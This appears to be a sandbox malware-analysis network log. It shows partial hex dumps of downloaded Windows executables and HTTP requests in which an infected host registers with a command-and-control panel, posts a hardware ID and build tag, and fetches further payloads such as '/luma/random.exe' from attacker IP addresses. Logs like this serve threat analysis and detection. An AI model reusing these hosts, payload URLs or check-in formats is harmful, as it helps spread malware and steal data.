Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:56:36 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 90 6c 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 2e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ab 02 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e 00 ec 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a cf 01 00 00 10 00 00 00 d0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 08 d1 00 00 00 e0 01 00 00 d2 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c bd 2b 00 00 c0 02 00 00 9e 0a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3e 4b 00 00 00 80 2e 00 00 4c 00 00 00 44 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:56:46 GMTContent-Type: application/octet-streamContent-Length: 1911296Last-Modified: Wed, 30 Oct 2024 20:53:56 GMTConnection: keep-aliveETag: "67229ce4-1d2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 6a e4 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b6 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 b6 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 62 67 68 74 69 71 78 00 10 1a 00 00 b0 31 00 00 0c 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 65 6c 74 63 6a 6c 78 00 10 00 00 00 c0 4b 00 00 06 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 08 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:56:46 GMTContent-Type: application/octet-streamContent-Length: 2837504Last-Modified: Wed, 30 Oct 2024 20:43:26 GMTConnection: keep-aliveETag: "67229a6e-2b4c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 9c 83 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 6b 65 6f 76 6a 6b 63 00 00 2b 00 00 a0 00 00 00 ec 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 78 61 64 6b 70 71 61 00 20 00 00 00 a0 2b 00 00 04 00 00 00 26 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 2a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:56:58 GMTContent-Type: application/octet-streamContent-Length: 1911296Last-Modified: Wed, 30 Oct 2024 20:53:56 GMTConnection: keep-aliveETag: "67229ce4-1d2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 6a e4 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b6 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 b6 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 62 67 68 74 69 71 78 00 10 1a 00 00 b0 31 00 00 0c 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 65 6c 74 63 6a 6c 78 00 10 00 00 00 c0 4b 00 00 06 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 08 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:57:03 GMTContent-Type: application/octet-streamContent-Length: 2837504Last-Modified: Wed, 30 Oct 2024 20:43:26 GMTConnection: keep-aliveETag: "67229a6e-2b4c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 9c 83 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 6b 65 6f 76 6a 6b 63 00 00 2b 00 00 a0 00 00 00 ec 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 78 61 64 6b 70 71 61 00 20 00 00 00 a0 2b 00 00 04 00 00 00 26 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 2a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:57:05 GMTContent-Type: application/octet-streamContent-Length: 1911296Last-Modified: Wed, 30 Oct 2024 20:53:56 GMTConnection: keep-aliveETag: "67229ce4-1d2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 6a e4 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b6 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 b6 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 62 67 68 74 69 71 78 00 10 1a 00 00 b0 31 00 00 0c 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 65 6c 74 63 6a 6c 78 00 10 00 00 00 c0 4b 00 00 06 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 08 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 35 32 43 37 36 42 38 35 39 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B52C76B85982D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002708001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002709001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 44 32 42 43 38 44 36 42 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 2d 2d 0d 0a Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="hwid"D5D2BC8D6BBE2099925286------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="build"tale------KKKKEHJKFCFCBFHIIDGD--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002710001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
